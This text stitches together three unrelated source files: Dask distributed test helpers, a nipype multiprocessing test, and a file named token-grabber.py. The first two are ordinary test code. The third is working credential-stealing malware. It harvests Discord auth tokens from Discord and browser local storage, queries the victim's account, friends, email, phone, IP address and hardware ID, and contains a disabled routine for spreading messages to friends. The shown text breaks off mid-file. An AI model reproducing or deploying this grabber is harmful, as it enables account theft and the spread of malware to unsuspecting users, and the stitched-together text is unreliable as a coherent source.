reset_logger_locks()
with log_errors():
with pristine_loop() as loop:
scheduler_addr = scheduler_q.get()
async def _():
worker = await Worker(scheduler_addr, validate=True, **kwargs)
q.put(worker.address)
await worker.finished()
try:
loop.run_sync(_)
finally:
loop.close(all_fds=True)
def run_nanny(q, scheduler_q, config, **kwargs):
with dask.config.set(config):
with log_errors():
with pristine_loop() as loop:
scheduler_addr = scheduler_q.get()
async def _():
worker = await Nanny(scheduler_addr, validate=True, **kwargs)
q.put(worker.address)
await worker.finished()
try:
loop.run_sync(_)
finally:
loop.close(all_fds=True)
@contextmanager
def check_active_rpc(loop, active_rpc_timeout=1):
active_before = set(rpc.active)
yield
    # Some streams can take a bit of time to notice their peer has closed,
    # and keep a coroutine (*) waiting for a CommClosedError before calling
    # close_rpc(). This happens especially when a non-localhost address is
    # used, as Nanny does.
    # (*) example: gather_from_workers()
def fail():
pytest.fail(
"some RPCs left active by test: %s" % (set(rpc.active) - active_before)
)
async def wait():
await async_wait_for(
lambda: len(set(rpc.active) - active_before) == 0,
timeout=active_rpc_timeout,
fail_func=fail,
)
loop.run_sync(wait)
@pytest.fixture
def cluster_fixture(loop):
with cluster() as (scheduler, workers):
yield (scheduler, workers)
@pytest.fixture
def s(cluster_fixture):
scheduler, workers = cluster_fixture
return scheduler
@pytest.fixture
def a(cluster_fixture):
scheduler, workers = cluster_fixture
return workers[0]
@pytest.fixture
def b(cluster_fixture):
scheduler, workers = cluster_fixture
return workers[1]
@pytest.fixture
def client(loop, cluster_fixture):
scheduler, workers = cluster_fixture
with Client(scheduler["address"], loop=loop) as client:
yield client
@pytest.fixture
def client_secondary(loop, cluster_fixture):
scheduler, workers = cluster_fixture
with Client(scheduler["address"], loop=loop) as client:
yield client
@contextmanager
def tls_cluster_context(
worker_kwargs=None, scheduler_kwargs=None, security=None, **kwargs
):
security = security or tls_only_security()
worker_kwargs = assoc(worker_kwargs or {}, "security", security)
scheduler_kwargs = assoc(scheduler_kwargs or {}, "security", security)
with cluster(
worker_kwargs=worker_kwargs, scheduler_kwargs=scheduler_kwargs, **kwargs
) as (s, workers):
yield s, workers
@pytest.fixture
def tls_cluster(loop, security):
with tls_cluster_context(security=security) as (scheduler, workers):
yield (scheduler, workers)
@pytest.fixture
def tls_client(tls_cluster, loop, security):
s, workers = tls_cluster
with Client(s["address"], security=security, loop=loop) as client:
yield client
@pytest.fixture
def security():
return tls_only_security()
@contextmanager
def cluster(
nworkers=2,
nanny=False,
worker_kwargs={},
active_rpc_timeout=10,
disconnect_timeout=20,
scheduler_kwargs={},
config={},
):
ws = weakref.WeakSet()
enable_proctitle_on_children()
with clean(timeout=active_rpc_timeout, threads=False) as loop:
if nanny:
_run_worker = run_nanny
else:
_run_worker = run_worker
# The scheduler queue will receive the scheduler's address
scheduler_q = mp_context.Queue()
# Launch scheduler
scheduler = mp_context.Process(
name="Dask cluster test: Scheduler",
target=run_scheduler,
args=(scheduler_q, nworkers + 1, config),
kwargs=scheduler_kwargs,
)
ws.add(scheduler)
scheduler.daemon = True
scheduler.start()
# Launch workers
workers = []
for i in range(nworkers):
q = mp_context.Queue()
fn = "_test_worker-%s" % uuid.uuid4()
kwargs = merge(
{
"nthreads": 1,
"local_directory": fn,
"memory_limit": system.MEMORY_LIMIT,
},
worker_kwargs,
)
proc = mp_context.Process(
name="Dask cluster test: Worker",
target=_run_worker,
args=(q, scheduler_q, config),
kwargs=kwargs,
)
ws.add(proc)
workers.append({"proc": proc, "queue": q, "dir": fn})
for worker in workers:
worker["proc"].start()
try:
for worker in workers:
worker["address"] = worker["queue"].get(timeout=5)
except queue.Empty:
raise pytest.xfail.Exception("Worker failed to start in test")
saddr = scheduler_q.get()
start = time()
try:
try:
security = scheduler_kwargs["security"]
rpc_kwargs = {"connection_args": security.get_connection_args("client")}
except KeyError:
rpc_kwargs = {}
with rpc(saddr, **rpc_kwargs) as s:
while True:
nthreads = loop.run_sync(s.ncores)
if len(nthreads) == nworkers:
break
if time() - start > 5:
raise Exception("Timeout on cluster creation")
# avoid sending processes down to function
yield {"address": saddr}, [
{"address": w["address"], "proc": weakref.ref(w["proc"])}
for w in workers
]
finally:
logger.debug("Closing out test cluster")
loop.run_sync(
lambda: disconnect_all(
[w["address"] for w in workers],
timeout=disconnect_timeout,
rpc_kwargs=rpc_kwargs,
)
)
loop.run_sync(
lambda: disconnect(
saddr, timeout=disconnect_timeout, rpc_kwargs=rpc_kwargs
)
)
scheduler.terminate()
scheduler_q.close()
scheduler_q._reader.close()
scheduler_q._writer.close()
for w in workers:
w["proc"].terminate()
w["queue"].close()
w["queue"]._reader.close()
w["queue"]._writer.close()
scheduler.join(2)
del scheduler
for proc in [w["proc"] for w in workers]:
proc.join(timeout=30)
with suppress(UnboundLocalError):
del worker, w, proc
del workers[:]
for fn in glob("_test_worker-*"):
with suppress(OSError):
shutil.rmtree(fn)
try:
client = default_client()
except ValueError:
pass
else:
client.close()
start = time()
while any(proc.is_alive() for proc in ws):
text = str(list(ws))
sleep(0.2)
assert time() < start + 5, ("Workers still around after five seconds", text)
async def disconnect(addr, timeout=3, rpc_kwargs=None):
rpc_kwargs = rpc_kwargs or {}
async def do_disconnect():
with rpc(addr, **rpc_kwargs) as w:
# If the worker was killed hard (e.g. sigterm) during test runtime,
# we do not know at this point and may not be able to connect
with suppress(EnvironmentError, CommClosedError):
# Do not request a reply since comms will be closed by the
# worker before a reply can be made and we will always trigger
# the timeout
await w.terminate(reply=False)
await asyncio.wait_for(do_disconnect(), timeout=timeout)
async def disconnect_all(addresses, timeout=3, rpc_kwargs=None):
await asyncio.gather(*[disconnect(addr, timeout, rpc_kwargs) for addr in addresses])
def gen_test(timeout=_TEST_TIMEOUT):
"""Coroutine test
@gen_test(timeout=5)
async def test_foo():
await ... # use tornado coroutines
"""
def _(func):
def test_func():
with clean() as loop:
if iscoroutinefunction(func):
cor = func
else:
cor = gen.coroutine(func)
loop.run_sync(cor, timeout=timeout)
return test_func
return _
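# Illustrative sketch (leading underscore keeps pytest from collecting it):
# a coroutine decorated with gen_test() is run to completion on a fresh
# IOLoop with the given timeout when the wrapped test function is called.
@gen_test(timeout=10)
async def _example_gen_test():
    await asyncio.sleep(0.01)
    assert inc(1) == 2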
from .scheduler import Scheduler
from .worker import Worker
async def start_cluster(
nthreads,
scheduler_addr,
loop,
security=None,
Worker=Worker,
scheduler_kwargs={},
worker_kwargs={},
):
s = await Scheduler(
loop=loop,
validate=True,
security=security,
port=0,
host=scheduler_addr,
**scheduler_kwargs,
)
workers = [
Worker(
s.address,
nthreads=ncore[1],
name=i,
security=security,
loop=loop,
validate=True,
host=ncore[0],
**(merge(worker_kwargs, ncore[2]) if len(ncore) > 2 else worker_kwargs),
)
for i, ncore in enumerate(nthreads)
]
# for w in workers:
# w.rpc = workers[0].rpc
await asyncio.gather(*workers)
start = time()
while len(s.workers) < len(nthreads) or any(
comm.comm is None for comm in s.stream_comms.values()
):
await asyncio.sleep(0.01)
if time() - start > 5:
await asyncio.gather(*[w.close(timeout=1) for w in workers])
await s.close(fast=True)
raise Exception("Cluster creation timeout")
return s, workers
async def end_cluster(s, workers):
logger.debug("Closing out test cluster")
async def end_worker(w):
with suppress(TimeoutError, CommClosedError, EnvironmentError):
await w.close(report=False)
await asyncio.gather(*[end_worker(w) for w in workers])
await s.close() # wait until scheduler stops completely
s.stop()
def gen_cluster(
nthreads=[("127.0.0.1", 1), ("127.0.0.1", 2)],
ncores=None,
scheduler="127.0.0.1",
timeout=_TEST_TIMEOUT,
security=None,
Worker=Worker,
client=False,
scheduler_kwargs={},
worker_kwargs={},
client_kwargs={},
active_rpc_timeout=1,
config={},
clean_kwargs={},
allow_unclosed=False,
):
from distributed import Client
""" Coroutine test with small cluster
@gen_cluster()
async def test_foo(scheduler, worker1, worker2):
await ... # use tornado coroutines
See also:
start
end
"""
if ncores is not None:
warnings.warn("ncores= has moved to nthreads=", stacklevel=2)
nthreads = ncores
worker_kwargs = merge(
{"memory_limit": system.MEMORY_LIMIT, "death_timeout": 10}, worker_kwargs
)
def _(func):
if not iscoroutinefunction(func):
func = gen.coroutine(func)
def test_func():
result = None
workers = []
with clean(timeout=active_rpc_timeout, **clean_kwargs) as loop:
async def coro():
with dask.config.set(config):
s = False
for _ in range(60):
try:
s, ws = await start_cluster(
nthreads,
scheduler,
loop,
security=security,
Worker=Worker,
scheduler_kwargs=scheduler_kwargs,
worker_kwargs=worker_kwargs,
)
except Exception as e:
logger.error(
"Failed to start gen_cluster: "
f"{e.__class__.__name__}: {e}; retrying",
exc_info=True,
)
await asyncio.sleep(1)
else:
workers[:] = ws
args = [s] + workers
break
if s is False:
raise Exception("Could not start cluster")
if client:
c = await Client(
s.address,
loop=loop,
security=security,
asynchronous=True,
**client_kwargs,
)
args = [c] + args
try:
future = func(*args)
if timeout:
future = asyncio.wait_for(future, timeout)
result = await future
if s.validate:
s.validate_state()
finally:
if client and c.status not in ("closing", "closed"):
await c._close(fast=s.status == Status.closed)
await end_cluster(s, workers)
await asyncio.wait_for(cleanup_global_workers(), 1)
try:
c = await default_client()
except ValueError:
pass
else:
await c._close(fast=True)
def get_unclosed():
return [c for c in Comm._instances if not c.closed()] + [
c
for c in _global_clients.values()
if c.status != "closed"
]
try:
start = time()
while time() < start + 60:
gc.collect()
if not get_unclosed():
break
await asyncio.sleep(0.05)
else:
if allow_unclosed:
print(f"Unclosed Comms: {get_unclosed()}")
else:
raise RuntimeError("Unclosed Comms", get_unclosed())
finally:
Comm._instances.clear()
_global_clients.clear()
return result
result = loop.run_sync(
coro, timeout=timeout * 2 if timeout else timeout
)
for w in workers:
if getattr(w, "data", None):
try:
w.data.clear()
except EnvironmentError:
# zict backends can fail if their storage directory
# was already removed
pass
del w.data
return result
return test_func
return _
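# Illustrative sketch (leading underscore keeps pytest from collecting it):
# gen_cluster() passes the coroutine a live Scheduler and Workers, plus an
# asynchronous Client first when client=True.
@gen_cluster(client=True)
async def _example_gen_cluster(c, s, a, b):
    future = c.submit(inc, 1)
    assert await future == 2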
def raises(func, exc=Exception):
try:
func()
return False
except exc:
return True
def terminate_process(proc):
if proc.poll() is None:
if sys.platform.startswith("win"):
proc.send_signal(signal.CTRL_BREAK_EVENT)
else:
proc.send_signal(signal.SIGINT)
try:
proc.wait(10)
finally:
# Make sure we don't leave the process lingering around
with suppress(OSError):
proc.kill()
@contextmanager
def popen(args, **kwargs):
kwargs["stdout"] = subprocess.PIPE
kwargs["stderr"] = subprocess.PIPE
if sys.platform.startswith("win"):
# Allow using CTRL_C_EVENT / CTRL_BREAK_EVENT
kwargs["creationflags"] = subprocess.CREATE_NEW_PROCESS_GROUP
dump_stdout = False
args = list(args)
if sys.platform.startswith("win"):
args[0] = os.path.join(sys.prefix, "Scripts", args[0])
else:
args[0] = os.path.join(
os.environ.get("DESTDIR", "") + sys.prefix, "bin", args[0]
)
proc = subprocess.Popen(args, **kwargs)
try:
yield proc
except Exception:
dump_stdout = True
raise
finally:
try:
terminate_process(proc)
finally:
# XXX Also dump stdout if return code != 0 ?
out, err = proc.communicate()
if dump_stdout:
print("\n\nPrint from stderr\n %s\n=================\n" % args[0][0])
print(err.decode())
print("\n\nPrint from stdout\n=================\n")
print(out.decode())
def wait_for_port(address, timeout=5):
assert isinstance(address, tuple)
deadline = time() + timeout
while True:
timeout = deadline - time()
if timeout < 0:
raise RuntimeError("Failed to connect to %s" % (address,))
try:
sock = socket.create_connection(address, timeout=timeout)
except EnvironmentError:
pass
else:
sock.close()
break
def wait_for(predicate, timeout, fail_func=None, period=0.001):
deadline = time() + timeout
while not predicate():
sleep(period)
if time() > deadline:
if fail_func is not None:
fail_func()
pytest.fail("condition not reached until %s seconds" % (timeout,))
async def async_wait_for(predicate, timeout, fail_func=None, period=0.001):
deadline = time() + timeout
while not predicate():
await asyncio.sleep(period)
if time() > deadline:
if fail_func is not None:
fail_func()
pytest.fail("condition not reached until %s seconds" % (timeout,))
@memoize
def has_ipv6():
"""
Return whether IPv6 is locally functional. This doesn't guarantee IPv6
is properly configured outside of localhost.
"""
if os.getenv("DISABLE_IPV6") == "1":
return False
serv = cli = None
try:
serv = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
serv.bind(("::", 0))
serv.listen(5)
cli = socket.create_connection(serv.getsockname()[:2])
except EnvironmentError:
return False
else:
return True
finally:
if cli is not None:
cli.close()
if serv is not None:
serv.close()
if has_ipv6():
def requires_ipv6(test_func):
return test_func
else:
requires_ipv6 = pytest.mark.skip("ipv6 required")
async def assert_can_connect(addr, timeout=0.5, **kwargs):
"""
Check that it is possible to connect to the distributed *addr*
within the given *timeout*.
"""
comm = await connect(addr, timeout=timeout, **kwargs)
comm.abort()
async def assert_cannot_connect(
addr, timeout=0.5, exception_class=EnvironmentError, **kwargs
):
"""
Check that it is impossible to connect to the distributed *addr*
within the given *timeout*.
"""
with pytest.raises(exception_class):
comm = await connect(addr, timeout=timeout, **kwargs)
comm.abort()
async def assert_can_connect_from_everywhere_4_6(port, protocol="tcp", **kwargs):
"""
Check that the local *port* is reachable from all IPv4 and IPv6 addresses.
"""
futures = [
assert_can_connect("%s://127.0.0.1:%d" % (protocol, port), **kwargs),
assert_can_connect("%s://%s:%d" % (protocol, get_ip(), port), **kwargs),
]
if has_ipv6():
futures += [
assert_can_connect("%s://[::1]:%d" % (protocol, port), **kwargs),
assert_can_connect("%s://[%s]:%d" % (protocol, get_ipv6(), port), **kwargs),
]
await asyncio.gather(*futures)
async def assert_can_connect_from_everywhere_4(port, protocol="tcp", **kwargs):
"""
Check that the local *port* is reachable from all IPv4 addresses.
"""
futures = [
assert_can_connect("%s://127.0.0.1:%d" % (protocol, port), **kwargs),
assert_can_connect("%s://%s:%d" % (protocol, get_ip(), port), **kwargs),
]
if has_ipv6():
futures += [
assert_cannot_connect("%s://[::1]:%d" % (protocol, port), **kwargs),
assert_cannot_connect(
"%s://[%s]:%d" % (protocol, get_ipv6(), port), **kwargs
),
]
await asyncio.gather(*futures)
async def assert_can_connect_locally_4(port, **kwargs):
"""
Check that the local *port* is only reachable from local IPv4 addresses.
"""
futures = [assert_can_connect("tcp://127.0.0.1:%d" % port, **kwargs)]
if get_ip() != "127.0.0.1": # No outside IPv4 connectivity?
futures += [assert_cannot_connect("tcp://%s:%d" % (get_ip(), port), **kwargs)]
if has_ipv6():
futures += [
assert_cannot_connect("tcp://[::1]:%d" % port, **kwargs),
assert_cannot_connect("tcp://[%s]:%d" % (get_ipv6(), port), **kwargs),
]
await asyncio.gather(*futures)
async def assert_can_connect_from_everywhere_6(port, **kwargs):
"""
Check that the local *port* is reachable from all IPv6 addresses.
"""
assert has_ipv6()
futures = [
assert_cannot_connect("tcp://127.0.0.1:%d" % port, **kwargs),
assert_cannot_connect("tcp://%s:%d" % (get_ip(), port), **kwargs),
assert_can_connect("tcp://[::1]:%d" % port, **kwargs),
assert_can_connect("tcp://[%s]:%d" % (get_ipv6(), port), **kwargs),
]
await asyncio.gather(*futures)
async def assert_can_connect_locally_6(port, **kwargs):
"""
Check that the local *port* is only reachable from local IPv6 addresses.
"""
assert has_ipv6()
futures = [
assert_cannot_connect("tcp://127.0.0.1:%d" % port, **kwargs),
assert_cannot_connect("tcp://%s:%d" % (get_ip(), port), **kwargs),
assert_can_connect("tcp://[::1]:%d" % port, **kwargs),
]
if get_ipv6() != "::1": # No outside IPv6 connectivity?
futures += [
assert_cannot_connect("tcp://[%s]:%d" % (get_ipv6(), port), **kwargs)
]
await asyncio.gather(*futures)
@contextmanager
def captured_logger(logger, level=logging.INFO, propagate=None):
"""Capture output from the given Logger."""
if isinstance(logger, str):
logger = logging.getLogger(logger)
orig_level = logger.level
orig_handlers = logger.handlers[:]
if propagate is not None:
orig_propagate = logger.propagate
logger.propagate = propagate
sio = io.StringIO()
logger.handlers[:] = [logging.StreamHandler(sio)]
logger.setLevel(level)
try:
yield sio
finally:
logger.handlers[:] = orig_handlers
logger.setLevel(orig_level)
if propagate is not None:
logger.propagate = orig_propagate
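# Illustrative sketch (not part of the original test helpers; the logger name
# is arbitrary): captured_logger() swaps the handlers for a StringIO so tests
# can assert on emitted log output.
def _example_captured_logger_usage():
    with captured_logger("distributed.example", level=logging.WARNING) as sio:
        logging.getLogger("distributed.example").warning("something happened")
    assert "something happened" in sio.getvalue()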
@contextmanager
def captured_handler(handler):
"""Capture output from the given logging.StreamHandler."""
assert isinstance(handler, logging.StreamHandler)
orig_stream = handler.stream
handler.stream = io.StringIO()
try:
yield handler.stream
finally:
handler.stream = orig_stream
@contextmanager
def new_config(new_config):
"""
Temporarily change configuration dictionary.
"""
from .config import defaults
config = dask.config.config
orig_config = copy.deepcopy(config)
try:
config.clear()
config.update(copy.deepcopy(defaults))
dask.config.update(config, new_config)
initialize_logging(config)
yield
finally:
config.clear()
config.update(orig_config)
initialize_logging(config)
@contextmanager
def new_environment(changes):
saved_environ = os.environ.copy()
os.environ.update(changes)
try:
yield
finally:
os.environ.clear()
os.environ.update(saved_environ)
@contextmanager
def new_config_file(c):
"""
Temporarily change configuration file to match dictionary *c*.
"""
import yaml
old_file = os.environ.get("DASK_CONFIG")
fd, path = tempfile.mkstemp(prefix="dask-config")
try:
with os.fdopen(fd, "w") as f:
f.write(yaml.dump(c))
os.environ["DASK_CONFIG"] = path
try:
yield
finally:
if old_file:
os.environ["DASK_CONFIG"] = old_file
else:
del os.environ["DASK_CONFIG"]
finally:
os.remove(path)
certs_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), "tests"))
def get_cert(filename):
"""
Get the path to one of the test TLS certificates.
"""
path = os.path.join(certs_dir, filename)
assert os.path.exists(path), path
return path
def tls_config():
"""
A functional TLS configuration with our test certs.
"""
ca_file = get_cert("tls-ca-cert.pem")
keycert = get_cert("tls-key-cert.pem")
return {
"distributed": {
"comm": {
"tls": {
"ca-file": ca_file,
"client": {"cert": keycert},
"scheduler": {"cert": keycert},
"worker": {"cert": keycert},
}
}
}
}
def tls_only_config():
"""
A functional TLS configuration with our test certs, disallowing
plain TCP communications.
"""
c = tls_config()
c["distributed"]["comm"]["require-encryption"] = True
return c
def tls_security():
"""
A Security object with proper TLS configuration.
"""
with new_config(tls_config()):
sec = Security()
return sec
def tls_only_security():
"""
A Security object with proper TLS configuration and disallowing plain
TCP communications.
"""
with new_config(tls_only_config()):
sec = Security()
assert sec.require_encryption
return sec
def get_server_ssl_context(
certfile="tls-cert.pem", keyfile="tls-key.pem", ca_file="tls-ca-cert.pem"
):
ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH, cafile=get_cert(ca_file))
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_cert_chain(get_cert(certfile), get_cert(keyfile))
return ctx
def get_client_ssl_context(
certfile="tls-cert.pem", keyfile="tls-key.pem", ca_file="tls-ca-cert.pem"
):
ctx = ssl.create_default_context(ssl.Purpose.SERVER_AUTH, cafile=get_cert(ca_file))
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_cert_chain(get_cert(certfile), get_cert(keyfile))
return ctx
def bump_rlimit(limit, desired):
resource = pytest.importorskip("resource")
try:
soft, hard = resource.getrlimit(limit)
if soft < desired:
resource.setrlimit(limit, (desired, max(hard, desired)))
except Exception as e:
pytest.skip("rlimit too low (%s) and can't be increased: %s" % (soft, e))
def gen_tls_cluster(**kwargs):
kwargs.setdefault("nthreads", [("tls://127.0.0.1", 1), ("tls://127.0.0.1", 2)])
return gen_cluster(
scheduler="tls://127.0.0.1", security=tls_only_security(), **kwargs
)
@contextmanager
def save_sys_modules():
old_modules = sys.modules
old_path = sys.path
try:
yield
finally:
for i, elem in enumerate(sys.path):
if elem not in old_path:
del sys.path[i]
for elem in sys.modules.keys():
if elem not in old_modules:
del sys.modules[elem]
@contextmanager
def check_thread_leak():
"""Context manager to ensure we haven't leaked any threads"""
active_threads_start = threading.enumerate()
yield
start = time()
while True:
bad_threads = [
thread
for thread in threading.enumerate()
if thread not in active_threads_start
and "Threaded" not in thread.name
and "watch message" not in thread.name
and "TCP-Executor" not in thread.name
# TODO: Make sure profile thread is cleaned up
# and remove the line below
and "Profile" not in thread.name
]
if not bad_threads:
break
else:
sleep(0.01)
if time() > start + 5:
# Raise an error with information about leaked threads
from distributed import profile
bad_thread = bad_threads[0]
call_stacks = profile.call_stack(sys._current_frames()[bad_thread.ident])
assert False, (bad_thread, call_stacks)
@contextmanager
def check_process_leak(check=True):
for proc in mp_context.active_children():
proc.terminate()
yield
if check:
for i in range(200):
if not set(mp_context.active_children()):
break
else:
sleep(0.2)
else:
assert not mp_context.active_children()
for proc in mp_context.active_children():
proc.terminate()
@contextmanager
def check_instances():
Client._instances.clear()
Worker._instances.clear()
Scheduler._instances.clear()
SpecCluster._instances.clear()
Worker._initialized_clients.clear()
# assert all(n.status == "closed" for n in Nanny._instances), {
# n: n.status for n in Nanny._instances
# }
Nanny._instances.clear()
_global_clients.clear()
Comm._instances.clear()
yield
start = time()
while set(_global_clients):
sleep(0.1)
assert time() < start + 10
_global_clients.clear()
for w in Worker._instances:
with suppress(RuntimeError): # closed IOLoop
w.loop.add_callback(w.close, report=False, executor_wait=False)
if w.status == Status.running:
w.loop.add_callback(w.close)
Worker._instances.clear()
start = time()
while any(c.status != "closed" for c in Worker._initialized_clients):
sleep(0.1)
assert time() < start + 10
Worker._initialized_clients.clear()
for i in range(5):
if all(c.closed() for c in Comm._instances):
break
else:
sleep(0.1)
else:
L = [c for c in Comm._instances if not c.closed()]
Comm._instances.clear()
print("Unclosed Comms", L)
# raise ValueError("Unclosed Comms", L)
assert all(
n.status == Status.closed or n.status == Status.init for n in Nanny._instances
), {n: n.status for n in Nanny._instances}
# assert not list(SpecCluster._instances) # TODO
assert all(c.status == Status.closed for c in SpecCluster._instances), list(
SpecCluster._instances
)
SpecCluster._instances.clear()
Nanny._instances.clear()
DequeHandler.clear_all_instances()
@contextmanager
def clean(threads=not WINDOWS, instances=True, timeout=1, processes=True):
with check_thread_leak() if threads else nullcontext():
with pristine_loop() as loop:
with check_process_leak(check=processes):
with check_instances() if instances else nullcontext():
with check_active_rpc(loop, timeout):
reset_config()
dask.config.set({"distributed.comm.timeouts.connect": "5s"})
# Restore default logging levels
# XXX use pytest hooks/fixtures instead?
for name, level in logging_levels.items():
logging.getLogger(name).setLevel(level)
yield loop
with suppress(AttributeError):
del thread_state.on_event_loop_thread
@pytest.fixture
def cleanup():
with clean():
yield
class TaskStateMetadataPlugin(WorkerPlugin):
"""WorkPlugin to populate TaskState.metadata"""
def setup(self, worker):
self.worker = worker
def transition(self, key, start, finish, **kwargs):
ts = self.worker.tasks[key]
if start == "ready" and finish == "executing":
ts.metadata["start_time"] = time()
elif start == "executing" and finish == "memory":
ts.metadata["stop_time"] = time()
|
test_legacymultiproc_nondaemon.py
|
# -*- coding: utf-8 -*-
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
"""Testing module for functions and classes from multiproc.py
"""
# Import packages
import os
import sys
from tempfile import mkdtemp
from shutil import rmtree
import pytest
import nipype.pipeline.engine as pe
from nipype.interfaces.utility import Function
def mytestFunction(insum=0):
"""
Run a multiprocessing job and spawn child processes.
"""
# need to import here since this is executed as an external process
import multiprocessing
import os
import tempfile
import time
numberOfThreads = 2
# list of processes
t = [None] * numberOfThreads
# list of alive flags
a = [None] * numberOfThreads
# list of tempFiles
f = [None] * numberOfThreads
def dummyFunction(filename):
"""
This function writes the value 45 to the given filename.
"""
j = 0
for i in range(0, 10):
j += i
# j is now 45 (0+1+2+3+4+5+6+7+8+9)
with open(filename, "w") as f:
f.write(str(j))
for n in range(numberOfThreads):
# mark thread as alive
a[n] = True
# create a temp file to use as the data exchange container
tmpFile = tempfile.mkstemp(".txt", "test_engine_")[1]
f[n] = tmpFile # keep track of the temp file
t[n] = multiprocessing.Process(target=dummyFunction, args=(tmpFile,))
# fire up the job
t[n].start()
# block until all processes are done
allDone = False
while not allDone:
time.sleep(1)
for n in range(numberOfThreads):
a[n] = t[n].is_alive()
if not any(a):
# if no thread is alive
allDone = True
# here, all processes are done
# read in all temp files and sum them up
total = insum
for ff in f:
with open(ff) as fd:
total += int(fd.read())
os.remove(ff)
return total
def run_multiproc_nondaemon_with_flag(nondaemon_flag):
"""
Start a pipe with two nodes using the resource multiproc plugin and
passing the nondaemon_flag.
"""
cur_dir = os.getcwd()
temp_dir = mkdtemp(prefix="test_engine_")
os.chdir(temp_dir)
pipe = pe.Workflow(name="pipe")
f1 = pe.Node(
interface=Function(
function=mytestFunction, input_names=["insum"], output_names=["sum_out"]
),
name="f1",
)
f2 = pe.Node(
interface=Function(
function=mytestFunction, input_names=["insum"], output_names=["sum_out"]
),
name="f2",
)
pipe.connect([(f1, f2, [("sum_out", "insum")])])
pipe.base_dir = os.getcwd()
f1.inputs.insum = 0
pipe.config["execution"]["stop_on_first_crash"] = True
# execute the pipe using the LegacyMultiProc plugin with 2 processes and the
# non_daemon flag to enable child processes which start other
# multiprocessing jobs
execgraph = pipe.run(
plugin="LegacyMultiProc",
plugin_args={"n_procs": 2, "non_daemon": nondaemon_flag},
)
names = [".".join((node._hierarchy, node.name)) for node in execgraph.nodes()]
node = list(execgraph.nodes())[names.index("pipe.f2")]
result = node.get_output("sum_out")
os.chdir(cur_dir)
rmtree(temp_dir)
return result
def test_run_multiproc_nondaemon_false():
"""
This is the entry point for the test. Two times a pipe of several
multiprocessing jobs gets executed. First, without the nondaemon flag.
Second, with the nondaemon flag.
Since the processes of the pipe start child processes, the execution only
succeeds when the non_daemon flag is on.
"""
shouldHaveFailed = False
try:
# with nondaemon_flag = False, the execution should fail
run_multiproc_nondaemon_with_flag(False)
except:
shouldHaveFailed = True
assert shouldHaveFailed
def test_run_multiproc_nondaemon_true():
# with nondaemon_flag = True, the execution should succeed
result = run_multiproc_nondaemon_with_flag(True)
    assert result == 180  # two pipeline nodes * numberOfThreads (2) * 45 == 180
|
token-grabber.py
|
import os
if os.name != "nt":
exit()
from re import findall
from json import loads, dumps
from base64 import b64decode
from subprocess import Popen, PIPE
from urllib.request import Request, urlopen
from datetime import datetime
from threading import Thread
from time import sleep
from sys import argv
LOCAL = os.getenv("LOCALAPPDATA")
ROAMING = os.getenv("APPDATA")
PATHS = {
"Discord" : ROAMING + "\\Discord",
"Discord Canary" : ROAMING + "\\discordcanary",
"Discord PTB" : ROAMING + "\\discordptb",
"Google Chrome" : LOCAL + "\\Google\\Chrome\\User Data\\Default",
"Opera" : ROAMING + "\\Opera Software\\Opera Stable",
"Brave" : LOCAL + "\\BraveSoftware\\Brave-Browser\\User Data\\Default",
"Yandex" : LOCAL + "\\Yandex\\YandexBrowser\\User Data\\Default"
}
def getheaders(token=None, content_type="application/json"):
headers = {
"Content-Type": content_type,
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11"
}
if token:
headers.update({"Authorization": token})
return headers
def getuserdata(token):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me", headers=getheaders(token))).read().decode())
except:
pass
def gettokens(path):
path += "\\Local Storage\\leveldb"
tokens = []
for file_name in os.listdir(path):
if not file_name.endswith(".log") and not file_name.endswith(".ldb"):
continue
for line in [x.strip() for x in open(f"{path}\\{file_name}", errors="ignore").readlines() if x.strip()]:
for regex in (r"[\w-]{24}\.[\w-]{6}\.[\w-]{27}", r"mfa\.[\w-]{84}"):
for token in findall(regex, line):
tokens.append(token)
return tokens
def getdeveloper():
dev = "wodx"
try:
dev = urlopen(Request("https://pastebin.com/raw/ssFxiejv")).read().decode()
except:
pass
return dev
def getip():
ip = "None"
try:
ip = urlopen(Request("https://api.ipify.org")).read().decode().strip()
except:
pass
return ip
def getavatar(uid, aid):
url = f"https://cdn.discordapp.com/avatars/{uid}/{aid}.gif"
try:
urlopen(Request(url))
except:
url = url[:-4]
return url
def gethwid():
p = Popen("wmic csproduct get uuid", shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE)
return (p.stdout.read() + p.stderr.read()).decode().split("\n")[1]
def getfriends(token):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/relationships", headers=getheaders(token))).read().decode())
except:
pass
def getchat(token, uid):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/channels", headers=getheaders(token), data=dumps({"recipient_id": uid}).encode())).read().decode())["id"]
except:
pass
def send_message(token, chat_id, form_data):
try:
urlopen(Request(f"https://discordapp.com/api/v6/channels/{chat_id}/messages", headers=getheaders(token, "multipart/form-data; boundary=---------------------------325414537030329320151394843687"), data=form_data.encode())).read().decode()
except:
pass
def spread(token, form_data, delay):
return
for friend in getfriends(token):
try:
chat_id = getchat(token, friend["id"])
send_message(token, chat_id, form_data)
except Exception as e:
pass
sleep(delay)
def main():
cache_path = ROAMING + "\\.cache~$"
prevent_spam = True
self_spread = True
embeds = []
working = []
checked = []
already_cached_tokens = []
working_ids = []
ip = getip()
user_path_name = os.getenv("userprofile").split("\\")[2]
developer = getdeveloper()
for platform, path in PATHS.items():
if not os.path.exists(path):
continue
for token in gettokens(path):
if token in checked:
continue
checked.append(token)
uid = None
if not token.startswith("mfa."):
try:
uid = b64decode(token.split(".")[0].encode()).decode()
except:
pass
if not uid or uid in working_ids:
continue
user_data = getuserdata(token)
if not user_data:
continue
working_ids.append(uid)
working.append(token)
username = user_data["username"] + "#" + str(user_data["discriminator"])
user_id = user_data["id"]
avatar_id = user_data["avatar"]
avatar_url = getavatar(user_id, avatar_id)
email = user_data.get("email")
phone = user_data.get("phone")
embed = {
"color": 0xff00cd,
"fields": [
{
